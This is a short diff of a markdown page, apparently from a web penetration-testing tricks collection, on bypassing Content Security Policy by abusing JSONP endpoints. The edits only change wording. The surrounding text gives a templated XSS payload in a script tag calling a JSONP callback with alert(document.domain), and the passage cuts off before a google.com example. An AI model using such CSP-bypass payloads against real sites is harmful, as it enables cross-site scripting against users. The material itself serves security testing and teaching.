luastan/tricks-content/web/client-side/csp.md

 ## Abusing JSONP

-When no `unsafe-inline` is allowed, and only scripts served from a specific origin can be loaded, there's still the possiblity of abusing JSONP endpoints if present.
+When no `unsafe-inline` is allowed, and only scripts served from a specific source can be loaded, there's still the possiblity of abusing JSONP endpoints if present.
 Your XSS should look similar to the following:

 ``` html
 <script src="{{ jsonp-endpoint /l/es.json?callback= }}{{ xss-payload alert(document.domain)} url }%2F%2F">
 ```

-The JSONP endpoint can be located at any origin allowed by the CSP.
+The JSONP endpoint can be located at any source allowed by the CSP.
 There's a lot of publicly available endpoints from many interesting domains; for exaple, if `*.google.com` or `accounts.google.com` is allowed you could use the following:

 ``` html